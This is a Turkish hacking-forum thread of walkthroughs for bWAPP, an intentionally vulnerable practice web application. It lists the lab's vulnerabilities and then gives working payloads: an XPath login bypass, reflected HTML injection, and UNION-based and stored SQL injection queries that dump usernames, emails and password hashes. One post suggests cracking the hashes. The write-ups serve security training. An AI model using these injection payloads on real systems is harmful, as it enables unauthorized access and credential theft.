bWAPP Çözümleri ~ Anka Tim

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

ᴄʀᴜᴇʟ

Özel Üye
24 Eyl 2013
4,420
56
Ahıska
bWAPP.jpg


Bu konu altında bWAPP'in çözümleri paylaşılacaktır.


bWAPP (Buggy Web Application) Nedir?
bWAPP, web uygulama güvenliğinde kendini geliştirmek isteyenler için hazırlanmış ücretsiz ve açık kaynak bir pentest/hacking test laboratuvarıdır. OWASP tarafından belirlenen en kritik güvenlik açıklarını hem saldırı hem de savunma yönünden öğrenmenize yardımcı olur.
bWAPP'de üç zorluk seviyesi bulunuyor. Bunlar; low, medium ve high.

DVWA'den daha kapsamlıdır ve çok daha fazla zaafiyeti barındırır. Daha önce açtığımız DVWA Çözümleri konusana göz atabilirsiniz.

DVWA Çözümleri ~ Anka Tim


bWAPP Hangi Zaafiyetleri Barındırıyor?
Kod:
[COLOR=Red]A1 -  Injection[/COLOR]

HTML Injection - Reflected (GET)
HTML Injection - Reflected (POST)
HTML Injection - Reflected (Current URL)
HTML Injection - Stored (Blog)
iFrame Injection
LDAP Injection (Search)
Mail Header Injection (SMTP)
OS Command Injection
OS Command Injection - Blind
PHP Code Injection
Server-Side Includes (SSI) Injection
SQL Injection (GET/Search)
SQL Injection (GET/Select)
SQL Injection (POST/Search)
SQL Injection (POST/Select)
SQL Injection (AJAX/JSON/jQuery)
SQL Injection (CAPTCHA)
SQL Injection (Login Form/Hero)
SQL Injection (Login Form/User)
SQL Injection (SQLite)
SQL Injection (Drupal)
SQL Injection - Stored (Blog)
SQL Injection - Stored (SQLite)
SQL Injection - Stored (User-Agent)
SQL Injection - Stored (XML)
SQL Injection - Blind - Boolean-Based
SQL Injection - Blind - Time-Based
SQL Injection - Blind (SQLite)
SQL Injection - Blind (Web Services/SOAP)
XML/XPath Injection (Login Form)
XML/XPath Injection (Search)


[COLOR=red]A2 - Broken Auth. & Session Mgmt.[/COLOR]

Broken Authentication - CAPTCHA Bypassing
Broken Authentication - Forgotten Function
Broken Authentication - Insecure Login Forms
Broken Authentication - Logout Management
Broken Authentication - Password Attacks
Broken Authentication - Weak Passwords
Session Management - Administrative Portals
Session Management - Cookies (HTTPOnly)
Session Management - Cookies (Secure)
Session Management - Session ID in URL
Session Management - Strong Sessions


[COLOR=red]A3 - Cross-Site Scripting (XSS)[/COLOR]

Cross-Site Scripting - Reflected (GET)
Cross-Site Scripting - Reflected (POST)
Cross-Site Scripting - Reflected (JSON)
Cross-Site Scripting - Reflected (AJAX/JSON)
Cross-Site Scripting - Reflected (AJAX/XML)
Cross-Site Scripting - Reflected (Back Button)
Cross-Site Scripting - Reflected (Custom Header)
Cross-Site Scripting - Reflected (Eval)</option>
Cross-Site Scripting - Reflected (HREF)</option>
Cross-Site Scripting - Reflected (Login Form)
Cross-Site Scripting - Reflected (phpMyAdmin)
Cross-Site Scripting - Reflected (PHP_SELF)
Cross-Site Scripting - Reflected (Referer)
Cross-Site Scripting - Reflected (User-Agent)
Cross-Site Scripting - Stored (Blog)
Cross-Site Scripting - Stored (Change Secret)
Cross-Site Scripting - Stored (Cookies)
Cross-Site Scripting - Stored (SQLiteManager)
Cross-Site Scripting - Stored (User-Agent)


[COLOR=red]A4 - Insecure Direct Object References [/COLOR]

Insecure DOR (Change Secret)
Insecure DOR (Reset Secret)
Insecure DOR (Order Tickets)
A5 - Security Misconfiguration
Arbitrary File Access (Samba)
Cross-Domain Policy File (Flash)
Cross-Origin Resource Sharing (AJAX)
Cross-Site Tracing (XST)
Denial-of-Service (Large Chunk Size)
Denial-of-Service (Slow HTTP DoS)
Denial-of-Service (SSL-Exhaustion)
Denial-of-Service (XML Bomb)
Insecure FTP Configuration
Insecure SNMP Configuration
Insecure WebDAV Configuration
Local Privilege Escalation (sendpage)
Local Privilege Escalation (udev)
Man-in-the-Middle Attack (HTTP)
Man-in-the-Middle Attack (SMTP)
Old/Backup & Unreferenced Files
Robots File


[COLOR=red]A6 - Sensitive Data Exposure [/COLOR]

Base64 Encoding (Secret)
BEAST/CRIME/BREACH Attacks
Clear Text HTTP (Credentials)
Heartbleed Vulnerability
Host Header Attack (Reset Poisoning)
HTML5 Web Storage (Secret)
POODLE Vulnerability
SSL 2.0 Deprecated Protocol
Text Files (Accounts)


[COLOR=red]A7 - Missing Functional Level Access Control [/COLOR]

Directory Traversal - Directories
Directory Traversal - Files
Host Header Attack (Cache Poisoning)
Host Header Attack (Reset Poisoning)
Local File Inclusion (SQLiteManager)
Remote & Local File Inclusion (RFI/LFI)
Restrict Device Access
Restrict Folder Access
Server Side Request Forgery (SSRF)
XML External Entity Attacks (XXE)


[COLOR=red]A8 - Cross-Site Request Forgery (CSRF)[/COLOR]

Cross-Site Request Forgery (Change Password)
Cross-Site Request Forgery (Change Secret)
Cross-Site Request Forgery (Transfer Amount)


[COLOR=red]A9 - Using Known Vulnerable Components[/COLOR]

Buffer Overflow (Local)
Buffer Overflow (Remote)
Drupal SQL Injection (Drupageddon)
Heartbleed Vulnerability
PHP CGI Remote Code Execution
PHP Eval Function
phpMyAdmin BBCode Tag XSS
Shellshock Vulnerability (CGI)
SQLiteManager Local File Inclusion
SQLiteManager PHP Code Injection
SQLiteManager XSS


[COLOR=red]A10 - Unvalidated Redirects & Forwards [/COLOR]

Unvalidated Redirects & Forwards (1)
Unvalidated Redirects & Forwards (2)
Other bugs... 
ClickJacking (Movie Tickets)
Client-Side Validation (Password)
HTTP Parameter Pollution
HTTP Response Splitting
HTTP Verb Tampering
Information Disclosure - Favicon
Information Disclosure - Headers
Information Disclosure - PHP version
Information Disclosure - Robots File
Insecure iFrame (Login Form)
Unrestricted File Upload


[COLOR=red]---------------  Extras  ----------------[/COLOR]

 A.I.M. - No-authentication Mode
Client Access Policy File
Cross-Domain Policy File
Evil 666 Fuzzing Page
Manual Intervention Required!
Unprotected Admin Portal
We Steal Secrets... (html)
We Steal Secrets... (plain)
WSDL File (Web Services/SOAP)


ANKA TİM
JZ8bXj.png
 
Son düzenleme:

нydrαтнαlleѕ

İSTİHBARAT!
8 Ocak 2017
3,208
1,438
bWAPP Low Level - XML/XPath Injection (Login Form)

bWAPP Low Level - XML/XPath Injection (Login Form)


İlk önce XML/XPath Injection (Login Form) u seçiyoruz

83By3a.png


seçip girdikten sonra bize ıd ve password girili bir alan geliyor. Id : Bee password : Bug


AGBCJe.png




Yukarıdaki resimde giriş denemesi yapılınca error veriyor sıra bypass kodumuzu deniyoruz


bypass kodumuz : 1'or'1'='1

Giriş yapiyoruz ve resim deki gibi başarılı sonuç aliyoruz.


ceQ99T.png




Videolu anlatım

[ame]https://www.youtube.com/watch?v=MFO5MgISyqY&t=52s[/ame]
 
Moderatör tarafında düzenlendi:

нydrαтнαlleѕ

İSTİHBARAT!
8 Ocak 2017
3,208
1,438
bWAPP Low Level - HTML Injection - Reflected (GET)

Öncelikle bWAPP HTML Injection - Reflected (GET)'i seçiyoruz

aTJ280.jpg


Ardından deneme olarak normal bir şekilde K.adına Hydra Şifre ye ise Thalles yazıyoruz

IfVdOG.jpg



Go dedikten sonra bize resimde ki gibi bir dönüt veriyor.

7TW9Jy.jpg



Şimdi ise html header etiketi ile deneme yapiyorum.

861fAx.jpg



Evet şifre yerine <h1> etiketini kullanarak Turkhackteam.org yaziyorum ve burada aldığım dönüt ise resimde ki gibidir, buradan html reflected açığı olduğunu anliyoruz.

48GH83.jpg


Videolu anlatımı

[ame]https://www.youtube.com/watch?v=saxL5N-1oi8[/ame]

 

BAGAY

Katılımcı Üye
13 Tem 2014
652
0
127.0.0.1

SQL INJECTION (SQLITE)


bWAPP Bugs bölümünden SQL Injection (Sqlite) ‘ı seçiyoruz ve Hack diyoruz :)
J0df6H.png


Sistemde sql açığı olduğunu bildiğimiz için hata var mı diye bakmayacağım. Direkt tabloları bulmaya başlayalım.Normalde sitelerde php?id=2 gibi sonunda bi sayı oluyor o sayıyı 0 varmış gibi varsayarak tabloları şöyle arayacağız.1,2,3,4 diye tek tek arayacağız hangisinde site hata vermezse tablo sayımızı bulduk demektir :)

cLQLPB.png

Evet bulduk 6 tablomuz varmış
0’ union select all 1,2,3,4,5,6 —

Daha sonra
Sistem sqlite olduğu için veritabanı adı sqlite_master dır.



zCVANy.png

0’ union select all 1,tbl_name,3,4,5,6 from sqlite_master —
Sorgusunu yaptık ve tablo isimlerini öğrendik.Bize lazım olan tablo adı users.



ACL1SA.png

Daha sonra bu sorgumuzu yapıyoruz.
0’ union select all 1,sql,3,4,5,6 from sqlite_master where tbl_name=‘users’ —
Burada users tablomuzun içindeki değişkenlerin ismini öğreniyoruz ve buna göre bilgilerini çekeceğiz.


WKCRBP.png

Geldik verileri çekmeye.Veri çekmek içinde şu sorgumuzu kullanıyoruz;
0’ union select all 1,id,login,password,email,6 from users —


Evet kullanıcı adı mail şifre hepsi geldi.Şifre md5 olarak geliyor.Onu çözmek içinde md5 crasher kullanabilirsiniz.
 
Son düzenleme:

BAGAY

Katılımcı Üye
13 Tem 2014
652
0
127.0.0.1
bWAPP SQL Injection - Stored(Blog)

bWAPP Bugs bölümünden SQL Injection - Stored(Blog) u seçiyoruz ve sonra Hack diyoruz.
e9fVef.png


Blog ekleme yerine ‘ yazıyoruz ve bu hatayı alıyoruz sql açık mevcut demektir.

CSBHHc.png



Veritabanı adını öğrenmek için şu sorguyu yapıyoruz;
bbb’ ,(select database()))— -

Veritabanı adımızı öğrendik aşağıdaki resimdeki gibiymiş.

CTW66Q.png



Veritabanı adı “bWAPP” ve buradan direkt tabloların isimleri çekelim.
bbb’ ,(select group_concat(table_name) FROM information_Schema.tables where table_schema = “bWAPP”)) —

OIN0BQ.png


Daha sonra users isimli tablomuzun kolonlarını çekiyoruz şu sorgu ile ;
bbb’ ,(select group_concat(column_name) FROM information_Schema.columns where table_name = “users”)) —


1fVORK.png


En son olarak da bilgileri çekiyoruz şöyle ;
bbb’ ,(select group_concat(id, login, password, email) FROM users)) —


LI1GSJ.png
 

нydrαтнαlleѕ

İSTİHBARAT!
8 Ocak 2017
3,208
1,438
bWAPP Low Level - HTML Injection - Reflected (Post)

Öncelikle bWAPP HTML Injection - Reflected (Post)'i seçiyoruz

Qff37A.png



Ardından deneme olarak normal bir şekilde K.adına Hydra Şifre ye ise Thalles yazıyoruz

NQ1PAG.png



Go dedikten sonra bize resimde ki gibi bir dönüt veriyor.

KffCc0.png



Şimdi ise html header etiketi ile deneme yapiyorum.

LOeGcW.jpg



Evet şifre yerine <h1> etiketini kullanarak Turkhackteam.org yaziyorum ve burada aldığım dönüt ise resimde ki gibidir, buradan html reflected açığı olduğunu anliyoruz.

B4xJz1.png



Videosu

[ame]https://www.youtube.com/watch?v=cbLp2klSC14&feature=youtu.be[/ame]



Get ile Post arasında ki fark ;

Get url üzerinden yönetilebilir , Post ise veri girebildiğimiz bir yerden
 
Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.